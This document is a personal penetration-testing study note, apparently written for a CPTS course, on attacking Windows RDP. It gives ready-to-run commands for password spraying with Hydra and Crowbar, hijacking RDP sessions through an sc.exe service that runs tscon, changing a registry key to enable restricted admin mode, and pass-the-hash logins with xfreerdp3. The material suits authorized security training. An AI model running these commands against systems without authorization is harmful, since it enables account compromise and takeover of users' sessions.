> See RDP Footprinting notes for more details: [[5 - CPTS Notes/2 - Footprinting Module/Service Enumeration/Windows Remote Mgmt|Windows Remote Mgmt]] # Introduction - Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft for GUI connection to a remote machine over the network - By default, RDP runs on TCP/3389 # Enumeration ```bash sudo nmap -Pn -p3389 -sC -sV <target_ip> ``` # Misconfigurations - By default, RDP requires a username and password - However, a null password is possible - Brute-forcing is also possible - Subject to password policy restrictions - Best to determine password policy before spraying - `Crowbar` or `Hydra` can be used for a password spraying attack against RDP ```bash sudo crowbar -b rdp -s <target_ip> -U users.txt -c 'password123' sudo hydra -L users.txt -p 'password123' <target_ip> rdp ``` # RDP Login - `rdesktop` or `xfreerdp3` can be used to login from Linux ```bash xfreerdp /v:<target_ip> /u:<username> /p:<password> /dynamic-resolution /drive:linux,~/Documents/htb rdesktop -u <username> -p <password> <target_ip> -d <FQDN> ``` # RDP Specific Attacks ## RDP Session Hijacking - To successfully impersonate a user without their password, we need to have `SYSTEM` privileges and use the Microsoft [tscon.exe](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/tscon) binary that enables users to connect to another desktop session - We need the session ID for the target user - This method no longer works for Windows Server 2019 - If we have local administrator privileges, we can use several methods to obtain `SYSTEM` privileges, such as [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec) or [Mimikatz](https://github.com/gentilkiwi/mimikatz) - Simple trick: Create a Windows service that, by default, will run as `Local System` and will execute any binary with `SYSTEM` privileges - Below, we use [Microsoft sc.exe](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/sc-create) binary - Then, we specify the service name (`sessionhijack`) and the `binpath`, which is the command we want to execute - When we run the command, a service named `sessionhijack` will be created ```powershell whoami /priv query user #shows RDP sessions for all users sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:<target_session_name>" net start sessionhijack #opens new terminal as target user ``` ## RDP PtH > For similar steps see, PtH in the Password Attacks Module: [[5 - CPTS Notes/6 - Password Attacks/16 - Pash the Hash (PtH)|16 - Pash the Hash (PtH)]] > - Assuming we only have the NT hash of a target user a credential dumping attack such as [SAM](https://en.wikipedia.org/wiki/Security_Account_Manager) database, and we could not crack the hash to reveal the plaintext password, we can perform an RDP PtH attack to gain GUI access to the target system using tools like `xfreerdp3` - First we need to enable `restricted admin mode` on the target host else we will get an error![[images/Pasted image 20251017191745.png]] - To fix this error add a new registry key `DisableRestrictedAdmin` under `KEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa` ```cmd reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f ``` - Then PtH with `xfreerdp3` ```bash xfreerdp3 /v:<target_ip> /u:username /pth:<NT_hash> /dynamic-resolution ```